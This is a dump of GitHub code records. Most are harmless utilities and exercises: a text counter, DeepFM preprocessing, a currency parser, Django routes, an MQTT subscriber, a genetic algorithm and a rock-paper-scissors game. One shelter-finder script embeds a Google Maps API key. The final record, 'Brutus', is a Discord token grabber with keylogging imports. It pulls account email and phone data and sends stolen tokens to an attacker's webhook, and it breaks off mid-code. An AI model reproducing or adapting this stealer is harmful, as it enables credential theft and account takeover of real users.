main()","repo_name":"jbeckom/python-mjdw","sub_path":"etl_benefitpoint_account_contacts.py","file_name":"etl_benefitpoint_account_contacts.py","file_ext":"py","file_size_in_byte":7098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"21676707944","text":"import re\nimport sys\n\ndef text_analyzer(*args):\n \"\"\"This function counts the number of upper characters, lower characters,\npunctuation and spaces in a given text.\"\"\"\n if (len(args) == 0):\n print(\"What is the text to analyse?\")\n print(\">> \",end = '')\n sys.stdout.flush()\n string = sys.stdin.readline()\n elif (len(args) == 1): \n string = args[0]\n elif (len(args) > 1):\n print (\"ERROR\")\n exit()\n upperCase = len(re.findall(r'[A-Z]',string))\n lowerCase = len(re.findall(r'[a-z]',string))\n punctuateChar = len(re.findall(r'[!?,.;\\'\\\"-]',string))\n spaces = len(re.findall(r'[ \\t\\n\\r\\v\\f]',string))\n\n print (\"{} upper letters\".format(upperCase))\n print (\"{} lower letters\".format(lowerCase))\n print (\"{} punctuation marks\".format(punctuateChar))\n print (\"{} spaces\".format(spaces))\n\n\n","repo_name":"Mr-lsaidi/42-python-module","sub_path":"module00/ex03/count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"39878455757","text":"#encoding=utf-8\nimport config\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\n\nimport pandas as pd\n\nclass FeatureDictionary(object):\n def __init__(self, trainfile=None, testfile=None,\n dfTrain=None, dfTest=None, numeric_cols=[], ignore_cols=[]):\n assert not ((trainfile is None) and (dfTrain is None)), \"trainfile or dfTrain at least one is set\"\n assert not ((trainfile is not None) and (dfTrain is not None)), \"only one can be set\"\n assert not ((testfile is None) and (dfTest is None)), \"testfile or dfTest at least one is set\"\n assert not ((testfile is not None) and (dfTest is not None)), \"only one can be set\"\n self.trainfile = trainfile\n self.testfile = testfile\n self.dfTrain = dfTrain\n self.dfTest = dfTest\n self.numeric_cols = numeric_cols\n self.ignore_cols = ignore_cols\n
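 # Editorial note (not part of the original file): gen_feat_dict, called below,
 # assigns each numeric column a single global feature index and each distinct
 # value of a categorical column its own index, e.g. for columns
 # "age" (numeric) and "city" with values {"NY", "LA"} it would build
 #     feat_dict = {"age": 0, "city": {"NY": 1, "LA": 2}}   # feat_dim = 3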
self.gen_feat_dict()\n\n def gen_feat_dict(self):\n if self.dfTrain is None:\n dfTrain = pd.read_csv(self.trainfile)\n else:\n dfTrain = self.dfTrain\n if self.dfTest is None:\n dfTest = pd.read_csv(self.testfile)\n else:\n dfTest = self.dfTest\n df = pd.concat([dfTrain, dfTest])\n self.feat_dict = {}\n tc = 0\n for col in df.columns:\n if col in self.ignore_cols:\n continue\n if col in self.numeric_cols:\n # map to a single index\n self.feat_dict[col] = tc\n tc += 1\n else:\n us = df[col].unique()\n self.feat_dict[col] = dict(zip(us, range(tc, len(us)+tc)))\n tc += len(us)\n\n self.feat_dim = tc\n\nclass DataParser(object):\n def __init__(self, feat_dict):\n self.feat_dict = feat_dict\n\n def parse(self, infile=None, df=None, has_label=False):\n assert not ((infile is None) and (df is None)), \"infile or df at least one is set\"\n assert not ((infile is not None) and (df is not None)), \"only one can be set\"\n if infile is None:\n dfi = df.copy()\n else:\n dfi = pd.read_csv(infile)\n if has_label:\n y = dfi[\"target\"].values.tolist()\n dfi.drop([\"id\", \"target\"], axis=1, inplace=True)\n else:\n ids = dfi[\"id\"].values.tolist()\n dfi.drop([\"id\"], axis=1, inplace=True)\n # dfi for feature index\n # dfv for feature value which can be either binary (1/0) or float (e.g., 10.24)\n dfv = dfi.copy()\n for col in dfi.columns:\n if col in self.feat_dict.ignore_cols:\n dfi.drop(col, axis=1, inplace=True)\n dfv.drop(col, axis=1, inplace=True)\n continue\n if col in self.feat_dict.numeric_cols:\n dfi[col] = self.feat_dict.feat_dict[col]\n else:\n dfi[col] = dfi[col].map(self.feat_dict.feat_dict[col])\n dfv[col] = 1.\n\n # list of list of feature indices of each sample in the dataset\n Xi = dfi.values.tolist()\n # list of list of feature values of each sample in the dataset\n Xv = dfv.values.tolist()\n if has_label:\n return Xi, Xv, y\n else:\n return Xi, Xv, ids\n\ndef load_data():\n '''\n 加载数据\n x_train: 训练数据不包含标签\n y_train: 训练数据中标签\n x_test: 测试数据中不包含标签\n ids_test: 测试数据的id\n cat_features_indices: 类别特征索引\n '''\n train_data = pd.read_csv(config.TRAIN_FILE)\n test_data = pd.read_csv(config.TEST_FILE)\n\n def process(df):\n cols = [c for c in df.columns if c not in ['id', 'target']]\n #统计每个数据的特征值为-1的总和,\n df[\"missing_feat\"] = np.sum((df[cols] == -1).values, axis=1)\n df[\"ps_car_13_x_ps_reg_03\"] = df[\"ps_car_13\"] * df[\"ps_reg_03\"]\n return df\n\n train_data = process(train_data)\n test_data = process(test_data)\n \n cols = [c for c in train_data.columns if c not in [\"id\", \"target\"]]\n cols = [c for c in cols if (not c in config.IGNORE_COLS)]\n\n '''\n 对连续值特征进行归一化处理\n '''\n ss = StandardScaler()\n for col in config.CATEGORICAL_COLS:\n train_data[col] = ss.fit_transform(train_data[col])\n\n x_train = train_data[cols].values\n y_train = train_data['target'].values\n x_test = test_data[cols].values\n \n ids_test = test_data['id'].values\n\n cat_features_indices = [i for i, c in enumerate(cols) if c in config.CATEGORICAL_COLS]\n\n return train_data, test_data, x_train, y_train, x_test, ids_test, cat_features_indices\n\nload_data()\n","repo_name":"xiaopp123/recommendation_practice","sub_path":"DeepFM/data_set.py","file_name":"data_set.py","file_ext":"py","file_size_in_byte":4715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30999150339","text":"import requests\nimport xml.etree.ElementTree as ET\nfrom src.exceptions import ParsingError\n\n\ndef get_currencies():\n \"\"\"\n Функция парсинга курса валюты с сайта ЦБ\n \"\"\"\n 
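# (Docstring above, translated: parses currency exchange rates from the Central Bank of Russia site.)\n    # The CBR feed quotes each currency per Nominal units, so the per-unit rate in RUB\n    # is Value / Nominal; for example (figures illustrative), a quote of 100 JPY = 65.50 RUB\n    # yields 0.655 RUB per JPY. RUB itself is pinned to 1.0 before the dict is returned.\n    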
try:\n response = requests.get(\"https://www.cbr.ru/scripts/XML_daily.asp\")\n if response.status_code != 200:\n raise ParsingError(f\"Ошибка получения курса валют! Статус:{response.status_code}\")\n\n root = ET.fromstring(response.content)\n formatted_currencies = {}\n for valute in root.findall('Valute'):\n char_code = valute.find('CharCode').text\n value = float(valute.find('Value').text.replace(',', '.'))\n nominal = int(valute.find('Nominal').text)\n rate = value / nominal\n formatted_currencies[char_code] = rate\n\n formatted_currencies['RUB'] = 1.0\n return formatted_currencies\n except ParsingError as error:\n print(error)\n\n\ndef filter_by_keyword(vacancies, keyword):\n \"\"\"\n Функция поиска по введенному пользователю слову\n \"\"\"\n filtered_vacancies = []\n keyword = keyword.lower()\n\n for vacancy in vacancies:\n if keyword in vacancy.title.lower() or keyword in vacancy.employer.lower():\n filtered_vacancies.append(vacancy)\n\n return filtered_vacancies\n\n\ndef filter_by_platform(vacancies, platform):\n \"\"\"\n Функция фильтрации вакансий по платформе\n \"\"\"\n return [vacancy for vacancy in vacancies if vacancy.api.lower() == platform.lower()]\n\n","repo_name":"asaksonov/parsing_hh_and_sj","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41446295177","text":"\"\"\"adoptamascota URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom . 
import views\nfrom django.conf.urls import include\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom organization.views import OrganizationListView, OrganizationCreateView, OrganizationDetailView, OrganizationUpdateView, OrganizationDeleteView\nfrom blog.views import BlogListView, BlogCreateView, BlogDetailView, BlogUpdateView, BlogDeleteView\nfrom pet.views import PetListView, PetCreateView, PetDetailView, PetUpdateView, PetDeleteView, OrgListView\n\nfrom users import views as users_views\n#from organization import views as organization_views\nurlpatterns = [\n path('admin/', admin.site.urls),\n\n path('organization/', OrganizationListView.as_view(template_name = \"organization/index.html\"), name='org_index'),\n path('organization/', OrganizationDetailView.as_view(template_name = \"organization/show.html\"), name='org_show'),\n #path('organization/create', organization_views.create, name='create'),\n path('organization/create', OrganizationCreateView.as_view(template_name = \"organization/form.html\"), name='org_create'),\n path('organization/edit/', OrganizationUpdateView.as_view(template_name = \"organization/form.html\"), name='org_edit'),\n path('organization/delete/', OrganizationDeleteView.as_view(), name='org_delete'),\n\n\n path('pet/', PetListView.as_view(template_name = \"pet/index.html\"), name='pet_index'),\n path('pet/org', OrgListView.as_view(template_name = \"pet/org_pets.html\"), name='org_pets'),\n path('pet/', PetDetailView.as_view(template_name = \"pet/show.html\"), name='pet_show'),\n path('pet/create', PetCreateView.as_view(template_name = \"pet/form.html\"), name='pet_create'),\n path('pet/edit/', PetUpdateView.as_view(template_name = \"pet/form.html\"), name='pet_edit'),\n path('pet/delete/', PetDeleteView.as_view(), name='pet_delete'),\n\n path('blog/', BlogListView.as_view(template_name = \"blog/index.html\"), name='blog_index'),\n path('blog/', BlogDetailView.as_view(template_name = \"blog/show.html\"), name='blog_show'),\n path('blog/create', BlogCreateView.as_view(template_name = \"blog/form.html\"), name='blog_create'),\n path('blog/edit/', BlogUpdateView.as_view(template_name = \"blog/form.html\"), name='blog_edit'),\n path('blog/delete/', BlogDeleteView.as_view(), name='blog_delete'),\n\n path('accounts/register', users_views.register, name='register'),\n path('accounts/profile', users_views.profile, name='profile'),\n\n path('', views.index, name='index'),\n path('contact_admin/', views.contactAdmin, name='contact_admin'),\n]\n\n#Add Django site authentication urls (for login, logout, password management)\nurlpatterns += [\n path('accounts/', include('django.contrib.auth.urls')),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n","repo_name":"Alondraptr/AdoptaMascotas","sub_path":"adoptamascota/adoptamascota/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39174635909","text":"import paho.mqtt.client as mqtt\nimport json\nimport time\nimport requests\nimport string\nfrom onAllarm import mailFile\n\nclass subscriber():\n\tdef __init__(self, cid, broker, port, topic):\n\t\tself.cid=cid\n\t\tself.broker=broker\n\t\tself.port=port\n\t\tself.topic=topic\n\t\tself.csmqtt=mqtt.Client(cid, False)\n\t\tself.csmqtt.on_connect=self.myOnConnect\n\t\tself.csmqtt.on_message=self.myOnMessage\n\n\tdef 
start(self):\n\t\tself.csmqtt.connect(self.broker, self.port)\n\t\tself.csmqtt.loop_start()\n\t\tself.csmqtt.subscribe(self.topic,2)\n\n\tdef stop(self):\n\t\tself.csmqtt.unsubscribe(self.topic)\n\t\tself.csmqtt.loop_stop()\n\t\tself.csmqtt.disconnect()\n\n\t\n\n\tdef myOnConnect (self, csmqtt, userdata, flags, rc):\n\t\tprint (\"Connected to %s topic %s with result code: %d\" % (self.messageBroker, self.topic, rc))\n\tdef myOnMessage (self, csmqtt , userdata, msg):\n\t\tprint (\"Topic:'\" + msg.topic+\"', QoS: '\"+str(msg.qos)+\"' Message: '\"+str(json.loads(msg.payload)) + \"'\")\n\t\tprint(((json.loads(msg.payload)).get(\"e\"))[0].get(\"v\"))\n\t\tprint(msg.topic)\n\n\t\tuserslist=requests.get('http://localhost:8080/users').json()\n\t\tfor user in userslist.values():\n\t\t\tmailFile(user.get('Name'),user.get('Surname'),user.get('Email Address'), time.ctime(time.time()))\n\n\t\t\t\n\nif __name__ == '__main__':\n\t\tsub=[]\n\t\tdata={'ID':'serv1','Description':'Gestore allarme','EndPoints':'iot/21/alarm'}\n\t\trpost=requests.post('http://localhost:8080/services',json.dumps(data))\n\t\trget=requests.get('http://localhost:8080/infoMQTT')\n\t\tjson_info=rget.json()\n\n\t\trgetTopic=requests.get(url+\"/devices?ID=Arduino\")\n\t\ttopica=rgetTopic.json()[0]['EndPoints']\n\n\t\tsub=subscriber('s1', json_info.get('Broker'), int(json_info.get('Port')), 'iot/21'+topica)\n\t\tsub.start()\n\n\n\t\ttime.sleep(4)\n\n\t\ttime.sleep(100)\n\t\tsub.stop()\n","repo_name":"clssra/TIoT21","sub_path":"TIOT GITHUB/SW/SW4/SW4_sub.py","file_name":"SW4_sub.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38968237765","text":"import sys\nfrom collections import deque\n\ndef topology_sort():\n result = []\n q = deque()\n # 1. 진입차수가 0인 모든 노드를 큐에 넣는다.\n for i in range(n):\n if indegree[i] == 0: # 처음은 진입차수가 0인 것부터. 진입차수 0이 시작하는 노드이기 때문\n q.append(i)\n # 2. 큐가 빌 때까지 아래 과정 반복한다.\n while q:\n # 2-1. 큐에서 원소를 꺼내 해당 노드에서 나가는 간선을 그래프에서 제거한다.\n now = q.popleft()\n result.append(now + 1) # 결과 넣기 \n for i in graph[now]:\n indegree[i] -= 1\n if indegree[i] == 0: # 2-2. 
새롭게 진입차수가 0이된 노드를 큐에 넣는다.\n q.append(i)\n\n if sum(indegree) > 0: # 순서 정하는 게 불가능한 경우\n print(0)\n else:\n [print(i) for i in result]\n\nn, m = map(int, sys.stdin.readline().split()) # 가수의 수, 보조 pd 수\nindegree = [0] * n\nresult = [1] * n\ngraph = [[] for i in range(n)]\n\nfor _ in range(m):\n list_ = list(map(int, sys.stdin.readline().split()))\n for a, b in zip(list_[1:], list_[2:]):\n graph[a - 1].append(b - 1) # a > b\n indegree[b - 1] += 1 # 진입 차수\n\ntopology_sort()","repo_name":"chaemj97/Algorithm","sub_path":"2022년/12월/백준_2623_음악프로그램.py","file_name":"백준_2623_음악프로그램.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20037010374","text":"import random\n\n# 设置选项及其描述(中文翻译:石头、剪刀、布)\noptions = {'rock': '石头', 'paper': '剪刀', 'scissors': '布'}\n\n# 可以获胜的情况\nwin_cases = [('rock', 'scissors'), ('paper', 'rock'), ('scissors', 'paper')]\n\noptions_enumerate = enumerate(options.items())\noptions_keys = list(options.keys())\n\n# 计算机随机选择选项的函数\n\n\ndef computer_choice():\n # 计算机随机选择一个选项\n computer_choice = random.choice(list(options.keys()))\n # 打印出计算机选择的选项\n print(\"计算机选择了:\", computer_choice)\n return computer_choice\n\n# 判断游戏结果的函数\n\n\ndef check_result(computer, user_choice):\n # 判断游戏结果\n if computer == user_choice:\n return \"tie(平)\"\n elif (computer, user_choice) in win_cases:\n return \"win(赢)\"\n else:\n return \"lose(输)\"\n\n# 等待用户输入选项的函数\n\n\ndef get_user_choice():\n # 等待用户输入选项\n options_prompt = \"、\".join(\n [f\"{index+1}:({desc}|{name})\" for index, (name, desc) in options_enumerate])\n user_choice_index = int(input(f\"请选择{options_prompt}:\"))\n # 获取用户选择的选项\n user_choice = options_keys[user_choice_index-1]\n print(\"好的,您的选择是:\", user_choice)\n return user_choice\n\n# 定义游戏函数\n\n\ndef play_game():\n user_choice = get_user_choice()\n computer = computer_choice()\n # 检查游戏结果并打印输出\n result = check_result(computer, user_choice)\n print(result)\n\n\n# 无限循环,直到用户选择退出\nwhile True:\n play_game()\n play_again = input(\"再玩一次?(y/n)\")\n if play_again.lower() != 'y':\n break\n","repo_name":"osins/osins-learning-python","sub_path":"code/rock-paper-scissors-game/src/simple/play_game5.py","file_name":"play_game5.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20873368949","text":"from CrackBox import Black_Box_Function\nimport numpy as np\n\nclass GA:\n def __init__(self, chromosome_size=16, population=200, cross_prob=0.9, muta_prob=0.3):\n self.crack = Black_Box_Function(\"input2.txt\", \"output2.txt\", \"2-6.exe\")\n self.chromosome_size = chromosome_size\n self.population = population\n self.cross_prob = cross_prob\n self.muta_prob = muta_prob\n\n def create_generation(self):\n chromosome = np.random.randint(high=2, low=0, size=self.chromosome_size)\n all_solution = np.empty((0, len(chromosome)))\n\n for i in range(self.population):\n np.random.shuffle(chromosome)\n all_solution = np.vstack((all_solution, chromosome))\n\n return all_solution\n\n #Function from black box\n def f(self, decode_x1, decode_x2):\n return self.crack.getFunction(decode_x1, decode_x2)\n\n #Objective Function\n def getObjective(self, chromosome):\n lb_x = -2\n ub_x = 2\n len_x = len(chromosome)//2\n precision_x = (ub_x - lb_x)/(2**len_x - 1)\n\n z = 0\n t = 1\n x_bit = 0\n x1_bit_sum = 0\n\n for i in range(len(chromosome)//2):\n x_bit = chromosome[-t]*(2**z)\n x1_bit_sum += x_bit\n z += 1\n t += 1\n \n z = 0\n t = 1 + 
len(chromosome)//2\n x_bit = 0\n x2_bit_sum = 0\n\n for i in range(len(chromosome)//2):\n x_bit = chromosome[-t]*(2**z)\n x2_bit_sum += x_bit\n z += 1\n t += 1\n\n decode_x1 = (x1_bit_sum) * precision_x + lb_x\n decode_x2 = (x2_bit_sum) * precision_x + lb_x\n\n return (decode_x1, decode_x2, self.f(decode_x1, decode_x2))\n\n #Tournament selection\n def find_parents_ts(self, all_solution):\n parents = np.empty((0, np.size(all_solution, 1)))\n\n for i in range(2):\n indices_list = np.random.choice(len(all_solution), 3, replace=False)\n\n posb_parent_1 = all_solution[indices_list[0]]\n posb_parent_2 = all_solution[indices_list[1]]\n posb_parent_3 = all_solution[indices_list[2]]\n\n obj_func_parent_1 = self.getObjective(posb_parent_1)[2]\n obj_func_parent_2 = self.getObjective(posb_parent_2)[2]\n obj_func_parent_3 = self.getObjective(posb_parent_3)[2]\n\n min_obj_func = min(obj_func_parent_1, obj_func_parent_2, obj_func_parent_3)\n\n if min_obj_func == obj_func_parent_1:\n selected_parent = posb_parent_1\n elif min_obj_func == obj_func_parent_2:\n selected_parent = posb_parent_2\n else:\n selected_parent = posb_parent_3\n \n parents = np.vstack((parents, selected_parent))\n \n parent_1 = parents[0,:]\n parent_2 = parents[1,:]\n\n return (parent_1, parent_2)\n\n #Crossover\n def crossover(self, parent_1, parent_2):\n cross_prob=self.cross_prob\n\n chlid_1 = np.empty((0, len(parent_1)))\n chlid_2 = np.empty((0, len(parent_2)))\n\n cross_rand_prob = np.random.rand()\n\n if cross_rand_prob < cross_prob:\n\n index_1 = np.random.randint(0, len(parent_1))\n index_2 = np.random.randint(0, len(parent_2))\n\n while index_1 == index_2:\n index_2 = np.random.randint(0, len(parent_2))\n\n if index_1 > index_2:\n index_1, index_2 = index_2, index_1\n \n #Parent_1\n first_sec_par_1 = parent_1[:index_1]\n mid_sec_par_1 = parent_1[index_1:index_2+1]\n last_sec_par_1 = parent_1[index_2+1:]\n \n #Parent_2\n first_sec_par_2 = parent_2[:index_1]\n mid_sec_par_2 = parent_2[index_1:index_2+1]\n last_sec_par_2 = parent_2[index_2+1:]\n\n chlid_1 = np.concatenate((first_sec_par_1, mid_sec_par_2, last_sec_par_1))\n chlid_2 = np.concatenate((first_sec_par_2, mid_sec_par_1, last_sec_par_2))\n\n else:\n chlid_1 = parent_1\n chlid_2 = parent_2\n\n return (chlid_1, chlid_2)\n\n def mutation(self, chlid_1, chlid_2):\n muta_prob=self.muta_prob\n\n #Chlid_1\n mutated_chlid_1 = np.empty((0, len(chlid_1)))\n\n t = 0\n for i in chlid_1:\n muta_rand_prob = np.random.rand()\n\n if muta_rand_prob < muta_prob:\n\n if chlid_1[t] == 0:\n chlid_1[t] = 1\n else:\n chlid_1[t] = 0\n\n mutated_chlid_1 = chlid_1\n t += 1\n\n else:\n mutated_chlid_1 = chlid_1\n t += 1\n\n #Chlid_2\n mutated_chlid_2 = np.empty((0, len(chlid_2)))\n\n t = 0\n for i in chlid_2:\n muta_rand_prob = np.random.rand()\n\n if muta_rand_prob < muta_prob:\n\n if chlid_2[t] == 0:\n chlid_2[t] = 1\n else:\n chlid_2[t] = 0\n\n mutated_chlid_2 = chlid_2\n t += 1\n \n else:\n mutated_chlid_2 = chlid_2\n t += 1\n\n return (mutated_chlid_1, mutated_chlid_2)","repo_name":"Rayato159/g6-optimization-project","sub_path":"src/Genetic_Algorithm.py","file_name":"Genetic_Algorithm.py","file_ext":"py","file_size_in_byte":5231,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"74646995431","text":"#-*- coding: utf-8 -*-\r\n#windows: chcp 65001を実行\r\nimport sys\r\nimport io\r\nimport csv\r\nimport codecs\r\nimport math\r\nfrom pyproj import Geod\r\nimport urllib.request\r\nimport os.path\r\n\r\n# マップ出力\r\ndef 
download(url):\r\n\timg = urllib.request.urlopen(url)\r\n\tlocalfile = open( './app/assets/images/staticmap.png', 'wb')\r\n\tlocalfile.write(img.read())\r\n\timg.close()\r\n\tlocalfile.close()\r\n\r\nsys.stdin = io.TextIOWrapper(sys.stdin.buffer, encoding='utf-8')\r\nsys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')\r\nsys.stderr = io.TextIOWrapper(sys.stderr.buffer, encoding='utf-8')\r\n\r\n# pathを取得\r\nlocation = []\r\nwith open('./data/gps.csv', newline='', encoding='utf-8') as f:\r\n reader = csv.reader(f, delimiter=',', quotechar='|')\r\n for i, row in enumerate(reader):\r\n location.append(row)\r\n\r\n# print(location[1][0], location[1][1])\r\n\r\n# get shelterlist\r\nshelterlist = []\r\nwith open('./data/shelterlist.csv', newline='', encoding='utf-8') as f:\r\n reader = csv.reader(f, delimiter=',', quotechar='|')\r\n for i, row in enumerate(reader):\r\n shelterlist.append(row)\r\n\r\n# print(shelterlist[1][3], shelterlist[1][4])\r\n\r\n# 近傍のshelter計算\r\ndistance = []\r\np1_latitude = location[1][0]\r\np1_longitude = location[1][1]\r\nobj_latitude = 0.0\r\nobj_longitude = 0.0\r\nobj_altitude = 0 # 単位は(m)\r\nfor i, row in enumerate(shelterlist):\r\n if i != 0:\r\n obj_latitude = row[3]\r\n obj_longitude = row[4]\r\n obj_altitude = 0 # 単位は(m)\r\n g = Geod(ellps='WGS84')\r\n azimuth, back_azimuth, distance_2d = g.inv(p1_longitude, p1_latitude, obj_longitude, obj_latitude)\r\n result = g.inv(p1_longitude, p1_latitude, obj_longitude, obj_latitude)\r\n # print (result)\r\n azimuth = result[0]\r\n back_azimuth = result[1]\r\n distance_2d = result[2]\r\n distance.append(distance_2d)\r\n\r\nmindist = float(\"inf\")\r\nfor i, dist in enumerate(distance):\r\n # print(dist)\r\n if mindist > dist:\r\n mindist = dist\r\n minindex = i\r\n\r\n# print(minindex, distance[minindex])\r\n# print(shelterlist[minindex+1])\r\n\r\n# p1_latitude\r\n# p1_longitude\r\nobj_latitude = shelterlist[minindex+1][3]\r\nobj_longitude = shelterlist[minindex+1][4]\r\n# print (p1_latitude, p1_longitude, obj_latitude, obj_longitude)\r\n\r\n# 地図と自己位置マーカー\r\n# url = \"https://maps.googleapis.com/maps/api/staticmap?center=34.687315,135.526201&size=640x480&sensor=false&zoom=14&markers=34.687315,135.526201&key=AIzaSyB62o5omyv9vrVo8Lwfm-Iq6FsNIMyfQ7I\"\r\n\r\n# 地図と自己位置マーカー青+避難所マーカー赤\r\n#url = \"https://maps.googleapis.com/maps/api/staticmap?center=34.687315,135.526201&size=640x480&sensor=false&zoom=14&markers=color%3Ablue%7Csize%3Anormal%7C34.687315%2C135.526201&markers=%7C34.688450%2C135.527450&path=color%3Ablue%7Cweight%3A12%7C34.687315%2C135.526201%7C34.688450%2C135.527450&key=AIzaSyB62o5omyv9vrVo8Lwfm-Iq6FsNIMyfQ7I\"\r\n# pathあり\r\n# url = \"https://maps.googleapis.com/maps/api/staticmap?center=\" + str(p1_latitude) + \",\" + str(p1_longitude) \\\r\n# + \"&size=640x480&sensor=false&zoom=14&markers=color:blue|size:normal|\" + str(p1_latitude) + \",\" + str(p1_longitude) \\\r\n# + \"&markers=\" + str(obj_latitude) + \",\" + str(obj_longitude) \\\r\n# + \"&path=color:blue|weight:12|\" + str(p1_latitude) + \",\" + str(p1_longitude) \\\r\n# + \"|\" + str(obj_latitude) + \",\" + str(obj_longitude) \\\r\n# + \"&key=AIzaSyB62o5omyv9vrVo8Lwfm-Iq6FsNIMyfQ7I\"\r\n\r\n# pathなし\r\nurl = \"https://maps.googleapis.com/maps/api/staticmap?center=\" + str(p1_latitude) + \",\" + str(p1_longitude) \\\r\n + \"&size=640x480&sensor=false&zoom=14&markers=color:blue|size:normal|\" + str(p1_latitude) + \",\" + str(p1_longitude) \\\r\n + \"&markers=\" + str(obj_latitude) + \",\" + str(obj_longitude) \\\r\n + 
\"&key=AIzaSyB62o5omyv9vrVo8Lwfm-Iq6FsNIMyfQ7I\"\r\n# print (url)\r\ndownload(url)\r\n\r\n# 特定のshelterのsupplieslist_no.を取得\r\n# ファイル名を返す\r\nwith open('./data/nearestshelter.txt' , 'w', newline='', encoding='utf-8') as f:\r\n f.write('supplieslist_' + str(minindex+1) + '.csv,'+str(minindex+1))\r\n","repo_name":"jphacks/KS_1608","sub_path":"workspace/scripts/getgps.py","file_name":"getgps.py","file_ext":"py","file_size_in_byte":4047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3433229988","text":"# www.github.com/Fontesie #\r\n\r\n\r\n\r\nfrom multiprocessing.connection import wait\r\nfrom re import findall\r\nimport keyboard\r\nfrom threading import Timer\r\nfrom datetime import datetime\r\nimport requests\r\nimport os\r\nimport time\r\nfrom random import randint\r\nimport json\r\nfrom urllib.request import Request, urlopen\r\nimport socket\r\nimport re\r\n\r\n\r\nwebhooklink = \"\" # Your Webhook\r\nSEND_REPORT_EVERY = 60 # Choose the time ( 60s = 1min )\r\n\r\n\r\n\r\n\r\n\r\n\r\nlappdata = os.getenv('LOCALAPPDATA')\r\noutput = lappdata+'/Temp/brutus' + str(randint(0, 100)) + '.tmp' \r\ncomputername = os.environ['COMPUTERNAME']\r\nwith open(output, 'w') as f:\r\n f.close()\r\n\r\ndef retrieve_user(token):\r\n return json.loads(requests.get(\"https://discord.com/api/v9/users/@me\", headers={\"Authorization\": token, \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\", \"Content-Type\": \"application/json\"}).text)\r\n\r\n\r\n\r\ndata = {\r\n \"avatar_url\": \"https://cdn.discordapp.com/avatars/854037287716651108/08948e1e8f48c0b056e525790f541168.png\", \r\n \"content\" : \"\",\r\n \"username\" : \"Brutus\"\r\n }\r\ndata[\"embeds\"] = [\r\n {\r\n \"description\" : f\"**Session started** ✅\\n **Session name:** {computername}\",\r\n \"title\" : \"Brutus\",\r\n \"footer\": {\r\n \"text\": \"Fontesie#2621 • github.com/Fontesie\"\r\n }\r\n }\r\n ]\r\n\r\nresult = requests.post(webhooklink, json = data)\r\n\r\nclass Brutus:\r\n\r\n def __init__(self):\r\n if os.name != 'nt':\r\n exit()\r\n\r\n self.tokens = []\r\n self.pc_roaming = os.getenv('APPDATA')\r\n self.pc_local = os.getenv('LOCALAPPDATA')\r\n\r\n self.scrape_tokens()\r\n\r\n for token in self.tokens:\r\n\r\n raw_user_data = retrieve_user(token)\r\n user_json_str = json.dumps(raw_user_data)\r\n user = json.loads(user_json_str)\r\n if \"username\" in user:\r\n\r\n if webhooklink:\r\n webhook_data = {\"username\": \"Brutus\", \"embeds\": [\r\n dict(title=\"Brutus\",\r\n\r\n fields=[\r\n {\r\n \"name\": \":computer: Account Information\",\r\n \"value\": f' User ID: {user[\"id\"]}\\n Username: {user[\"username\"] + \"#\" + user[\"discriminator\"]}\\n Email: {user[\"email\"]}\\n Phone: {user[\"phone\"]}',\r\n\r\n \"inline\": True\r\n \r\n },\r\n\r\n {\r\n \"name\": f\":computer: Token:\",\r\n \"value\": f\"{token}\",\r\n \"inline\": True\r\n },\r\n\r\n ]),\r\n ]}\r\n\r\n data = {\r\n \"avatar_url\": \"https://cdn.discordapp.com/avatars/854037287716651108/08948e1e8f48c0b056e525790f541168.png\", \r\n \"content\" : \"\",\r\n \"username\" : \"Brutus\"\r\n }\r\n data[\"embeds\"] = [\r\n {\r\n \"description\" : f\"**Session started on** ✅\\n **Session name:** {computername}\",\r\n \"title\" : \"Brutus\",\r\n \"footer\": {\r\n \"text\": \"Fontesie#2621 • github.com/Fontesie\"\r\n }\r\n }\r\n ]\r\n result = requests.post(webhooklink, headers={\"Content-Type\": \"application/json\"}, 
